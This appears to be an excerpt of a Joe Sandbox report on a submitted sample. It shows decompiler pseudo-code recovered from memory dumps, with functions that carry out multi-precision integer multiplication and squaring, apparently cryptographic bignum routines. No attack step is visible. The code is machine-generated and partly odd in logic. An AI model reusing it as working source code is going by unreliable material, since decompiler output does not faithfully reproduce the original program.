    				if(_t419 >= 0) {
    					_t419 =  *(_t633 + 8);
    				}
    				_t582 = _t581 + _t419;
    				if(_t582 < _t419) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *((intOrPtr*)(_t354 + 0x34)) = _t510;
    				_t332 =  *(_t331 + 0x1c);
    				_t631 = _t332 & 0x0000ffff;
    				_t333 = _t332 >> 0x10;
    				_t512 = _t631 * _t333;
    				_t422 = _t333 * _t333 + (_t512 >> 0xf);
    				_t513 = _t512 << 0x11;
    				_t338 = _t631 * _t631 + _t513;
    				if(_t338 < _t513) {
    					_t422 = _t422 + 1;
    				}
    				_t583 = _t582 + _t338;
    				if(_t583 < _t338) {
    					_t422 = _t422 + 1;
    				}
    				 *((intOrPtr*)(_t354 + 0x38)) = _t583;
    				 *((intOrPtr*)(_t354 + 0x3c)) = _t422 +  *(_t633 - 8);
    				return _t338;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D8A1C(signed short* __eax, signed short* __ecx, intOrPtr* _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed short* _t258;
    				unsigned int _t261;
    				signed int _t262;
    				intOrPtr _t263;
    				signed int _t264;
    				signed int _t268;
    				unsigned int _t271;
    				signed int _t272;
    				signed int _t273;
    				signed int _t275;
    				signed int _t277;
    				signed int _t279;
    				signed int _t281;
    				signed int _t283;
    				signed int _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t291;
    				signed int _t293;
    				signed int _t295;
    				signed int _t297;
    				signed int _t299;
    				signed short* _t300;
    				signed int _t301;
    				signed int _t302;
    				void* _t303;
    				signed int _t306;
    				signed int _t307;
    				intOrPtr _t308;
    				signed int _t309;
    				signed int _t310;
    				void* _t311;
    				signed int _t315;
    				signed int _t316;
    				intOrPtr _t318;
    				signed int _t322;
    				signed int _t323;
    				signed int _t327;
    				signed int _t328;
    				signed int _t332;
    				signed int _t333;
    				intOrPtr _t335;
    				signed int _t339;
    				signed int _t340;
    				signed int _t344;
    				signed int _t345;
    				signed int _t349;
    				signed int _t350;
    				signed int _t354;
    				signed int _t355;
    				intOrPtr _t357;
    				signed int _t361;
    				signed int _t362;
    				signed int _t366;
    				signed int _t367;
    				signed int _t371;
    				signed int _t372;
    				intOrPtr _t374;
    				signed int _t378;
    				signed int _t379;
    				signed int _t383;
    				signed int _t384;
    				intOrPtr _t386;
    				signed int _t387;
    				signed int _t388;
    				void* _t389;
    				signed int _t390;
    				signed int _t398;
    				signed int _t402;
    				signed int _t403;
    				signed int _t404;
    				void* _t405;
    				signed int _t406;
    				signed int _t409;
    				void* _t413;
    				signed int _t414;
    				signed int _t417;
    				void* _t421;
    				signed int _t422;
    				signed int _t425;
    				void* _t429;
    				signed int _t430;
    				signed int _t433;
    				void* _t437;
    				signed int _t438;
    				signed int _t441;
    				void* _t445;
    				signed int _t446;
    				signed int _t449;
    				void* _t453;
    				signed int _t454;
    				signed int _t457;
    				void* _t461;
    				signed int _t462;
    				signed int _t465;
    				void* _t469;
    				signed int _t470;
    				signed int _t473;
    				void* _t477;
    				signed int _t478;
    				signed int _t481;
    				void* _t485;
    				signed int _t486;
    				signed int _t489;
    				void* _t493;
    				signed int _t494;
    				signed int _t497;
    				void* _t501;
    				signed int _t502;
    				unsigned int _t505;
    				signed int _t506;
    				signed int _t508;
    				signed int _t509;
    				signed int _t510;
    				signed int _t511;
    				signed int _t514;
    				void* _t518;
    				signed int _t520;
    				signed int _t522;
    				signed int _t523;
    				void* _t524;
    				signed int _t525;
    				signed int _t526;
    				void* _t527;
    				signed int _t528;
    				signed int _t529;
    				void* _t530;
    				signed int _t532;
    				signed int _t533;
    				void* _t534;
    				signed int _t535;
    				signed int _t536;
    				void* _t537;
    				signed int _t538;
    				signed int _t539;
    				void* _t540;
    				signed int _t541;
    				signed int _t542;
    				void* _t543;
    				signed int _t545;
    				signed int _t546;
    				void* _t547;
    				signed int _t548;
    				signed int _t549;
    				void* _t550;
    				signed int _t551;
    				signed int _t552;
    				void* _t553;
    				signed int _t555;
    				signed int _t556;
    				void* _t557;
    				signed int _t558;
    				signed int _t559;
    				void* _t560;
    				signed int _t563;
    				intOrPtr _t567;
    
    				_t300 = __ecx;
    				_t258 = __eax;
    				_t264 =  *__eax & 0x0000ffff;
    				_t390 = __ecx[1] & 0x0000ffff;
    				_v16 = _t390;
    				_v20 = __eax[1] & 0x0000ffff;
    				_t306 =  *__ecx & 0x0000ffff;
    				_t307 = _t306 * _t264;
    				_v12 = _t390 * _t264;
    				_t505 = _t306 * _v20 + _v12;
    				_v16 = _v16 * (__eax[1] & 0x0000ffff);
    				if(_t505 < _v12) {
    					_v16 = _v16 + 0x10000;
    				}
    				_t506 = _t505 << 0x10;
    				_v16 = _v16 + (_t505 >> 0x10);
    				_t308 = _t307 + _t506;
    				if(_t308 < _t506) {
    					_v16 = _v16 + 1;
    				}
    				 *_a4 = _t308;
    				_t309 =  *_t300 & 0x0000ffff;
    				_t508 = _t300[1] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_t268 = _t258[2] & 0x0000ffff;
    				_v20 = _t309 * (_t258[3] & 0x0000ffff);
    				_t310 = _t309 * _t268;
    				_t398 = _t508 * _t268;
    				_t509 = _t508 * (_t258[3] & 0x0000ffff);
    				_t271 = _v20 + _t398;
    				if(_t271 < _t398) {
    					_t509 = _t509 + 0x10000;
    				}
    				_t272 = _t271 << 0x10;
    				_t311 = _t310 + _t272;
    				_t510 = _t509 + (_t271 >> 0x10);
    				if(_t311 < _t272) {
    					_t510 = _t510 + 1;
    				}
    				_t402 = _v16 + _t311;
    				_v20 = _t510;
    				_v12 = _t402;
    				if(_t402 < _t311) {
    					_v20 = _t510 + 1;
    				}
    				_t273 =  *_t258 & 0x0000ffff;
    				_t511 = _t300[2] & 0x0000ffff;
    				_t403 = _t300[3] & 0x0000ffff;
    				_v16 = _t258[1] & 0x0000ffff;
    				_v16 = _t511 * _t273;
    				_t514 = _t403 * _t273;
    				_t315 = _t511 * _v16 + _t514;
    				_t404 = _t403 * (_t258[1] & 0x0000ffff);
    				if(_t315 < _t514) {
    					_t404 = _t404 + 0x10000;
    				}
    				_t405 = _t404 + (_t315 >> 0x10);
    				_t316 = _t315 << 0x10;
    				_t518 = _v16 + _t316;
    				if(_t518 < _t316) {
    					_t405 = _t405 + 1;
    				}
    				_t318 = _v12 + _t518;
    				if(_t318 < _t518) {
    					_t405 = _t405 + 1;
    				}
    				_t520 = _v20 + _t405;
    				_v16 = _t520;
    				if(_t520 < _t405) {
    					_v8 = 1;
    				}
    				 *((intOrPtr*)(_a4 + 4)) = _t318;
    				_t275 =  *_t258 & 0x0000ffff;
    				_t406 = _t300[4] & 0x0000ffff;
    				_t522 = _t300[5] & 0x0000ffff;
    				_v12 = _v12 & 0x00000000;
    				_v20 = _t258[1] & 0x0000ffff;
    				_v20 = _t406 * _t275;
    				_t409 = _t522 * _t275;
    				_t322 = _t406 * _v20 + _t409;
    				_t523 = _t522 * (_t258[1] & 0x0000ffff);
    				if(_t322 < _t409) {
    					_t523 = _t523 + 0x10000;
    				}
    				_t524 = _t523 + (_t322 >> 0x10);
    				_t323 = _t322 << 0x10;
    				_t413 = _v20 + _t323;
    				if(_t413 < _t323) {
    					_t524 = _t524 + 1;
    				}
    				_v16 = _v16 + _t413;
    				if(_v16 < _t413) {
    					_t524 = _t524 + 1;
    				}
    				_v8 = _v8 + _t524;
    				if(_v8 < _t524) {
    					_v12 = 1;
    				}
    				_t277 = _t258[2] & 0x0000ffff;
    				_t414 = _t300[2] & 0x0000ffff;
    				_t525 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t414 * _t277;
    				_t417 = _t525 * _t277;
    				_t327 = _t414 * _v20 + _t417;
    				_t526 = _t525 * (_t258[3] & 0x0000ffff);
    				if(_t327 < _t417) {
    					_t526 = _t526 + 0x10000;
    				}
    				_t527 = _t526 + (_t327 >> 0x10);
    				_t328 = _t327 << 0x10;
    				_t421 = _v20 + _t328;
    				if(_t421 < _t328) {
    					_t527 = _t527 + 1;
    				}
    				_v16 = _v16 + _t421;
    				if(_v16 < _t421) {
    					_t527 = _t527 + 1;
    				}
    				_v8 = _v8 + _t527;
    				if(_v8 < _t527) {
    					_v12 = _v12 + 1;
    				}
    				_t279 = _t258[4] & 0x0000ffff;
    				_t422 =  *_t300 & 0x0000ffff;
    				_t528 = _t300[1] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t422 * _t279;
    				_t425 = _t528 * _t279;
    				_t332 = _t422 * _v20 + _t425;
    				_t529 = _t528 * (_t258[5] & 0x0000ffff);
    				if(_t332 < _t425) {
    					_t529 = _t529 + 0x10000;
    				}
    				_t530 = _t529 + (_t332 >> 0x10);
    				_t333 = _t332 << 0x10;
    				_t429 = _v20 + _t333;
    				if(_t429 < _t333) {
    					_t530 = _t530 + 1;
    				}
    				_t335 = _v16 + _t429;
    				if(_t335 < _t429) {
    					_t530 = _t530 + 1;
    				}
    				_v8 = _v8 + _t530;
    				if(_v8 < _t530) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 8)) = _t335;
    				_t281 = _t258[6] & 0x0000ffff;
    				_t430 =  *_t300 & 0x0000ffff;
    				_t532 = _t300[1] & 0x0000ffff;
    				_v16 = _v16 & 0x00000000;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t430 * _t281;
    				_t433 = _t532 * _t281;
    				_t339 = _t430 * _v20 + _t433;
    				_t533 = _t532 * (_t258[7] & 0x0000ffff);
    				if(_t339 < _t433) {
    					_t533 = _t533 + 0x10000;
    				}
    				_t534 = _t533 + (_t339 >> 0x10);
    				_t340 = _t339 << 0x10;
    				_t437 = _v20 + _t340;
    				if(_t437 < _t340) {
    					_t534 = _t534 + 1;
    				}
    				_v8 = _v8 + _t437;
    				if(_v8 < _t437) {
    					_t534 = _t534 + 1;
    				}
    				_v12 = _v12 + _t534;
    				if(_v12 < _t534) {
    					_v16 = 1;
    				}
    				_t283 = _t258[4] & 0x0000ffff;
    				_t438 = _t300[2] & 0x0000ffff;
    				_t535 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t438 * _t283;
    				_t441 = _t535 * _t283;
    				_t344 = _t438 * _v20 + _t441;
    				_t536 = _t535 * (_t258[5] & 0x0000ffff);
    				if(_t344 < _t441) {
    					_t536 = _t536 + 0x10000;
    				}
    				_t537 = _t536 + (_t344 >> 0x10);
    				_t345 = _t344 << 0x10;
    				_t445 = _v20 + _t345;
    				if(_t445 < _t345) {
    					_t537 = _t537 + 1;
    				}
    				_v8 = _v8 + _t445;
    				if(_v8 < _t445) {
    					_t537 = _t537 + 1;
    				}
    				_v12 = _v12 + _t537;
    				if(_v12 < _t537) {
    					_v16 = _v16 + 1;
    				}
    				_t285 = _t258[2] & 0x0000ffff;
    				_t446 = _t300[4] & 0x0000ffff;
    				_t538 = _t300[5] & 0x0000ffff;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t446 * _t285;
    				_t449 = _t538 * _t285;
    				_t349 = _t446 * _v20 + _t449;
    				_t539 = _t538 * (_t258[3] & 0x0000ffff);
    				if(_t349 < _t449) {
    					_t539 = _t539 + 0x10000;
    				}
    				_t540 = _t539 + (_t349 >> 0x10);
    				_t350 = _t349 << 0x10;
    				_t453 = _v20 + _t350;
    				if(_t453 < _t350) {
    					_t540 = _t540 + 1;
    				}
    				_v8 = _v8 + _t453;
    				if(_v8 < _t453) {
    					_t540 = _t540 + 1;
    				}
    				_v12 = _v12 + _t540;
    				if(_v12 < _t540) {
    					_v16 = _v16 + 1;
    				}
    				_t287 =  *_t258 & 0x0000ffff;
    				_t454 = _t300[6] & 0x0000ffff;
    				_t541 = _t300[7] & 0x0000ffff;
    				_v20 = _t258[1] & 0x0000ffff;
    				_v20 = _t454 * _t287;
    				_t457 = _t541 * _t287;
    				_t354 = _t454 * _v20 + _t457;
    				_t542 = _t541 * (_t258[1] & 0x0000ffff);
    				if(_t354 < _t457) {
    					_t542 = _t542 + 0x10000;
    				}
    				_t543 = _t542 + (_t354 >> 0x10);
    				_t355 = _t354 << 0x10;
    				_t461 = _v20 + _t355;
    				if(_t461 < _t355) {
    					_t543 = _t543 + 1;
    				}
    				_t357 = _v8 + _t461;
    				if(_t357 < _t461) {
    					_t543 = _t543 + 1;
    				}
    				_v12 = _v12 + _t543;
    				if(_v12 < _t543) {
    					_v16 = _v16 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0xc)) = _t357;
    				_t289 = _t258[2] & 0x0000ffff;
    				_t462 = _t300[6] & 0x0000ffff;
    				_t545 = _t300[7] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t462 * _t289;
    				_t465 = _t545 * _t289;
    				_t361 = _t462 * _v20 + _t465;
    				_t546 = _t545 * (_t258[3] & 0x0000ffff);
    				if(_t361 < _t465) {
    					_t546 = _t546 + 0x10000;
    				}
    				_t547 = _t546 + (_t361 >> 0x10);
    				_t362 = _t361 << 0x10;
    				_t469 = _v20 + _t362;
    				if(_t469 < _t362) {
    					_t547 = _t547 + 1;
    				}
    				_v12 = _v12 + _t469;
    				if(_v12 < _t469) {
    					_t547 = _t547 + 1;
    				}
    				_v16 = _v16 + _t547;
    				if(_v16 < _t547) {
    					_v8 = 1;
    				}
    				_t291 = _t258[4] & 0x0000ffff;
    				_t470 = _t300[4] & 0x0000ffff;
    				_t548 = _t300[5] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t470 * _t291;
    				_t473 = _t548 * _t291;
    				_t366 = _t470 * _v20 + _t473;
    				_t549 = _t548 * (_t258[5] & 0x0000ffff);
    				if(_t366 < _t473) {
    					_t549 = _t549 + 0x10000;
    				}
    				_t550 = _t549 + (_t366 >> 0x10);
    				_t367 = _t366 << 0x10;
    				_t477 = _v20 + _t367;
    				if(_t477 < _t367) {
    					_t550 = _t550 + 1;
    				}
    				_v12 = _v12 + _t477;
    				if(_v12 < _t477) {
    					_t550 = _t550 + 1;
    				}
    				_v16 = _v16 + _t550;
    				if(_v16 < _t550) {
    					_v8 = _v8 + 1;
    				}
    				_t293 = _t258[6] & 0x0000ffff;
    				_t478 = _t300[2] & 0x0000ffff;
    				_t551 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t478 * _t293;
    				_t481 = _t551 * _t293;
    				_t371 = _t478 * _v20 + _t481;
    				_t552 = _t551 * (_t258[7] & 0x0000ffff);
    				if(_t371 < _t481) {
    					_t552 = _t552 + 0x10000;
    				}
    				_t553 = _t552 + (_t371 >> 0x10);
    				_t372 = _t371 << 0x10;
    				_t485 = _v20 + _t372;
    				if(_t485 < _t372) {
    					_t553 = _t553 + 1;
    				}
    				_t374 = _v12 + _t485;
    				if(_t374 < _t485) {
    					_t553 = _t553 + 1;
    				}
    				_v16 = _v16 + _t553;
    				if(_v16 < _t553) {
    					_v8 = _v8 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0x10)) = _t374;
    				_t295 = _t258[6] & 0x0000ffff;
    				_t486 = _t300[4] & 0x0000ffff;
    				_t555 = _t300[5] & 0x0000ffff;
    				_v12 = _v12 & 0x00000000;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t486 * _t295;
    				_t489 = _t555 * _t295;
    				_t378 = _t486 * _v20 + _t489;
    				_t556 = _t555 * (_t258[7] & 0x0000ffff);
    				if(_t378 < _t489) {
    					_t556 = _t556 + 0x10000;
    				}
    				_t557 = _t556 + (_t378 >> 0x10);
    				_t379 = _t378 << 0x10;
    				_t493 = _v20 + _t379;
    				if(_t493 < _t379) {
    					_t557 = _t557 + 1;
    				}
    				_v16 = _v16 + _t493;
    				if(_v16 < _t493) {
    					_t557 = _t557 + 1;
    				}
    				_v8 = _v8 + _t557;
    				if(_v8 < _t557) {
    					_v12 = 1;
    				}
    				_t297 = _t258[4] & 0x0000ffff;
    				_t494 = _t300[6] & 0x0000ffff;
    				_t558 = _t300[7] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t494 * _t297;
    				_t497 = _t558 * _t297;
    				_t383 = _t494 * _v20 + _t497;
    				_t559 = _t558 * (_t258[5] & 0x0000ffff);
    				if(_t383 < _t497) {
    					_t559 = _t559 + 0x10000;
    				}
    				_t560 = _t559 + (_t383 >> 0x10);
    				_t384 = _t383 << 0x10;
    				_t501 = _v20 + _t384;
    				if(_t501 < _t384) {
    					_t560 = _t560 + 1;
    				}
    				_t386 = _v16 + _t501;
    				if(_t386 < _t501) {
    					_t560 = _t560 + 1;
    				}
    				_v8 = _v8 + _t560;
    				if(_v8 < _t560) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0x14)) = _t386;
    				_t387 = _t300[6] & 0x0000ffff;
    				_t502 = _t258[6] & 0x0000ffff;
    				_t299 = _t258[7] & 0x0000ffff;
    				_t301 = _t300[7] & 0x0000ffff;
    				_t388 = _t387 * _t502;
    				_t302 = _t301 * _t299;
    				_t563 = _t301 * _t502;
    				_t261 = _t387 * _t299 + _t563;
    				if(_t261 < _t563) {
    					_t302 = _t302 + 0x10000;
    				}
    				_t262 = _t261 << 0x10;
    				_t389 = _t388 + _t262;
    				_t303 = _t302 + (_t261 >> 0x10);
    				if(_t389 < _t262) {
    					_t303 = _t303 + 1;
    				}
    				_t567 = _v8 + _t389;
    				if(_t567 < _t389) {
    					_t303 = _t303 + 1;
    				}
    				_t263 = _a4;
    				 *((intOrPtr*)(_t263 + 0x18)) = _t567;
    				 *((intOrPtr*)(_t263 + 0x1c)) = _t303 + _v12;
    				return _t263;
    			}


    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D9F4C(unsigned int* __eax, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed short* _t167;
    				unsigned int _t168;
    				signed int _t169;
    				void* _t174;
    				unsigned int _t175;
    				signed int _t176;
    				void* _t178;
    				void* _t179;
    				void* _t180;
    				void* _t181;
    				intOrPtr _t182;
    				signed int _t183;
    				signed int _t184;
    				void* _t186;
    				signed int _t188;
    				signed int _t189;
    				void* _t190;
    				signed int _t192;
    				void* _t194;
    				signed int _t196;
    				signed int _t197;
    				signed int _t198;
    				signed int _t199;
    				signed int _t202;
    				signed int _t203;
    				void* _t204;
    				signed int _t206;
    				signed int _t207;
    				void* _t208;
    				signed int _t210;
    				void* _t212;
    				signed int _t214;
    				signed int _t215;
    				signed int _t216;
    				signed int _t217;
    				signed int _t219;
    				signed int _t220;
    				signed int _t221;
    				signed int _t222;
    				void* _t225;
    				unsigned int _t228;
    				signed int _t229;
    				signed int _t231;
    				signed int _t232;
    				void* _t233;
    				unsigned int _t234;
    				signed int _t235;
    				void* _t237;
    				unsigned int _t240;
    				signed int _t241;
    				signed int _t242;
    				unsigned int _t245;
    				signed int _t246;
    				void* _t247;
    				unsigned int _t250;
    				signed int _t251;
    				void* _t252;
    				unsigned int _t253;
    				signed int _t254;
    				void* _t256;
    				unsigned int _t259;
    				signed int _t260;
    				signed int _t261;
    				intOrPtr _t263;
    				unsigned int _t266;
    				signed int _t267;
    				signed int _t268;
    				intOrPtr _t270;
    				signed int _t272;
    				signed int _t273;
    				signed int _t274;
    				signed int _t276;
    				void* _t279;
    				signed int _t282;
    				signed int _t284;
    				signed int _t287;
    				signed int _t289;
    				signed int _t292;
    				signed int _t294;
    				signed int _t299;
    				signed int _t301;
    				signed int _t304;
    				signed int _t306;
    				void* _t310;
    				void* _t311;
    				intOrPtr _t312;
    				unsigned int _t317;
    				signed int _t318;
    				void* _t319;
    				intOrPtr _t320;
    				unsigned int _t322;
    				signed int _t323;
    				signed int _t324;
    				signed int _t325;
    				void* _t326;
    				signed int _t327;
    				signed int _t328;
    				void* _t329;
    				signed int _t330;
    				signed int _t331;
    				void* _t332;
    				unsigned int _t334;
    				signed int _t335;
    				signed int _t336;
    				signed int _t337;
    				void* _t338;
    				signed int _t339;
    				signed int _t340;
    				void* _t341;
    				signed int _t342;
    
    				_t167 = __eax;
    				_t175 =  *__eax;
    				_t184 = _t175 & 0x0000ffff;
    				_t176 = _t175 >> 0x10;
    				_t228 = _t184 * _t176;
    				_t229 = _t228 << 0x11;
    				_t186 = _t184 * _t184 + _t229;
    				_t178 = _t176 * _t176 + (_t228 >> 0xf);
    				if(_t186 < _t229) {
    					_t178 = _t178 + 1;
    				}
    				 *_a4 = _t186;
    				_t274 = _t167[1] & 0x0000ffff;
    				_t231 = _t167[3] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_v16 =  *_t167 & 0x0000ffff;
    				_t188 = _t167[2] & 0x0000ffff;
    				_t189 = _t188 * _v16;
    				_v20 = _t274;
    				_t232 = _t231 * _v20;
    				_t276 = _t231 * _v16;
    				_t317 = _t188 * _t274 + _t276;
    				if(_t317 < _t276) {
    					_t232 = _t232 + 0x10000;
    				}
    				_t318 = _t317 << 0x10;
    				_t190 = _t189 + _t318;
    				_t233 = _t232 + (_t317 >> 0x10);
    				if(_t190 < _t318) {
    					_t233 = _t233 + 1;
    				}
    				_t319 = _t190 + _t178;
    				_t279 = _t233;
    				if(_t319 < _t190) {
    					_t279 = _t233 + 1;
    				}
    				_t320 = _t319 + _t190;
    				if(_t320 < _t190) {
    					_t233 = _t233 + 1;
    				}
    				_t179 = _t279 + _t233;
    				if(_t179 < _t233) {
    					_v8 = 1;
    				}
    				_v12 = _v12 & 0x00000000;
    				 *((intOrPtr*)(_a4 + 4)) = _t320;
    				_t234 = _t167[2];
    				_t192 = _t234 & 0x0000ffff;
    				_t235 = _t234 >> 0x10;
    				_t322 = _t192 * _t235;
    				_t323 = _t322 << 0x11;
    				_t194 = _t192 * _t192 + _t323;
    				_t237 = _t235 * _t235 + (_t322 >> 0xf);
    				if(_t194 < _t323) {
    					_t237 = _t237 + 1;
    				}
    				_t180 = _t179 + _t194;
    				if(_t180 < _t194) {
    					_t237 = _t237 + 1;
    				}
    				_v8 = _v8 + _t237;
    				if(_v8 < _t237) {
    					_v12 = 1;
    				}
    				_t324 = _t167[4] & 0x0000ffff;
    				_t282 = _t167[1] & 0x0000ffff;
    				_v16 =  *_t167 & 0x0000ffff;
    				_t196 = _t167[5] & 0x0000ffff;
    				_t325 = _t324 * _v16;
    				_v20 = _t282;
    				_t197 = _t196 * _v20;
    				_t284 = _t196 * _v16;
    				_t240 = _t324 * _t282 + _t284;
    				if(_t240 < _t284) {
    					_t197 = _t197 + 0x10000;
    				}
    				_t241 = _t240 << 0x10;
    				_t326 = _t325 + _t241;
    				_t198 = _t197 + (_t240 >> 0x10);
    				if(_t326 < _t241) {
    					_t198 = _t198 + 1;
    				}
    				_t181 = _t180 + _t326;
    				_v20 = _t198;
    				_t242 = _t198;
    				if(_t181 < _t326) {
    					_t242 = _t198 + 1;
    				}
    				_v8 = _v8 + _t242;
    				if(_v8 < _t242) {
    					_v12 = _v12 + 1;
    				}
    				_t182 = _t181 + _t326;
    				_t199 = _t198 + 1;
    				if(_t199 >= 0) {
    					_t199 = _v20;
    				}
    				_v8 = _v8 + _t199;
    				if(_v8 < _t199) {
    					_v12 = _v12 + 1;
    				}
    				_v16 = _v16 & 0x00000000;
    				 *((intOrPtr*)(_a4 + 8)) = _t182;
    				_t287 =  *_t167 & 0x0000ffff;
    				_t327 = _t167[6] & 0x0000ffff;
    				_v20 = _t167[1] & 0x0000ffff;
    				_t202 = _t167[7] & 0x0000ffff;
    				_t328 = _t327 * _t287;
    				_v24 = _t287;
    				_t203 = _t202 * _v20;
    				_t289 = _t202 * _v24;
    				_t245 = _t327 * _v20 + _t289;
    				if(_t245 < _t289) {
    					_t203 = _t203 + 0x10000;
    				}
    				_t246 = _t245 << 0x10;
    				_t329 = _t328 + _t246;
    				_t204 = _t203 + (_t245 >> 0x10);
    				if(_t329 < _t246) {
    					_t204 = _t204 + 1;
    				}
    				_v8 = _v8 + _t329;
    				_t247 = _t204;
    				if(_v8 < _t329) {
    					_t247 = _t204 + 1;
    				}
    				_v12 = _v12 + _t247;
    				if(_v12 < _t247) {
    					_v16 = 1;
    				}
    				_v8 = _v8 + _t329;
    				if(_v8 < _t329) {
    					_t204 = _t204 + 1;
    				}
    				_v12 = _v12 + _t204;
    				if(_v12 < _t204) {
    					_v16 = _v16 + 1;
    				}
    				_t292 = _t167[2] & 0x0000ffff;
    				_t330 = _t167[4] & 0x0000ffff;
    				_v20 = _t167[3] & 0x0000ffff;
    				_t206 = _t167[5] & 0x0000ffff;
    				_t331 = _t330 * _t292;
    				_v24 = _t292;
    				_t207 = _t206 * _v20;
    				_t294 = _t206 * _v24;
    				_t250 = _t330 * _v20 + _t294;
    				if(_t250 < _t294) {
    					_t207 = _t207 + 0x10000;
    				}
    				_t251 = _t250 << 0x10;
    				_t332 = _t331 + _t251;
    				_t208 = _t207 + (_t250 >> 0x10);
    				if(_t332 < _t251) {
    					_t208 = _t208 + 1;
    				}
    				_v8 = _v8 + _t332;
    				_t252 = _t208;
    				if(_v8 < _t332) {
    					_t252 = _t208 + 1;
    				}
    				_v12 = _v12 + _t252;
    				if(_v12 < _t252) {
    					_v16 = _v16 + 1;
    				}
    				_v8 = _v8 + _t332;
    				if(_v8 < _t332) {
    					_t208 = _t208 + 1;
    				}
    				_v12 = _v12 + _t208;
    				if(_v12 < _t208) {
    					_v16 = _v16 + 1;
    				}
    				_t183 = _a4;
    				_v8 = _v8 & 0x00000000;
    				 *((intOrPtr*)(_t183 + 0xc)) = _v8;
    				_t253 = _t167[4];
    				_t210 = _t253 & 0x0000ffff;
    				_t254 = _t253 >> 0x10;
    				_t334 = _t210 * _t254;
    				_t335 = _t334 << 0x11;
    				_t212 = _t210 * _t210 + _t335;
    				_t256 = _t254 * _t254 + (_t334 >> 0xf);
    				if(_t212 < _t335) {
    					_t256 = _t256 + 1;
    				}
    				_v12 = _v12 + _t212;
    				if(_v12 < _t212) {
    					_t256 = _t256 + 1;
    				}
    				_v16 = _v16 + _t256;
    				if(_v16 < _t256) {
    					_v8 = 1;
    				}
    				_t299 = _t167[2] & 0x0000ffff;
    				_t336 = _t167[6] & 0x0000ffff;
    				_a4 = _t167[3] & 0x0000ffff;
    				_t214 = _t167[7] & 0x0000ffff;
    				_t337 = _t336 * _t299;
    				_v24 = _t299;
    				_t215 = _t214 * _a4;
    				_t301 = _t214 * _v24;
    				_t259 = _t336 * _a4 + _t301;
    				if(_t259 < _t301) {
    					_t215 = _t215 + 0x10000;
    				}
    				_t260 = _t259 << 0x10;
    				_t338 = _t337 + _t260;
    				_t216 = _t215 + (_t259 >> 0x10);
    				if(_t338 < _t260) {
    					_t216 = _t216 + 1;
    				}
    				_v12 = _v12 + _t338;
    				_a4 = _t216;
    				_t261 = _t216;
    				if(_v12 < _t338) {
    					_t126 = _t216 + 1; // 0x1
    					_t261 = _t126;
    				}
    				_v16 = _v16 + _t261;
    				if(_v16 < _t261) {
    					_v8 = _v8 + 1;
    				}
    				_t263 = _v12 + _t338;
    				_t217 = _t216 + 1;
    				if(_t217 >= 0) {
    					_t217 = _a4;
    				}
    				_v16 = _v16 + _t217;
    				if(_v16 < _t217) {
    					_v8 = _v8 + 1;
    				}
    				_v12 = _v12 & 0x00000000;
    				 *((intOrPtr*)(_t183 + 0x10)) = _t263;
    				_t304 = _t167[4] & 0x0000ffff;
    				_t339 = _t167[6] & 0x0000ffff;
    				_a4 = _t167[5] & 0x0000ffff;
    				_t219 = _t167[7] & 0x0000ffff;
    				_t340 = _t339 * _t304;
    				_v24 = _t304;
    				_t220 = _t219 * _a4;
    				_t306 = _t219 * _v24;
    				_t266 = _t339 * _a4 + _t306;
    				if(_t266 < _t306) {
    					_t220 = _t220 + 0x10000;
    				}
    				_t267 = _t266 << 0x10;
    				_t341 = _t340 + _t267;
    				_t221 = _t220 + (_t266 >> 0x10);
    				if(_t341 < _t267) {
    					_t221 = _t221 + 1;
    				}
    				_v16 = _v16 + _t341;
    				_a4 = _t221;
    				_t268 = _t221;
    				if(_v16 < _t341) {
    					_t155 = _t221 + 1; // 0x1
    					_t268 = _t155;
    				}
    				_t310 = _v8 + _t268;
    				if(_t310 < _t268) {
    					_v12 = 1;
    				}
    				_t270 = _v16 + _t341;
    				_t222 = _t221 + 1;
    				if(_t222 >= 0) {
    					_t222 = _a4;
    				}
    				_t311 = _t310 + _t222;
    				if(_t311 < _t222) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_t183 + 0x14)) = _t270;
    				_t168 = _t167[6];
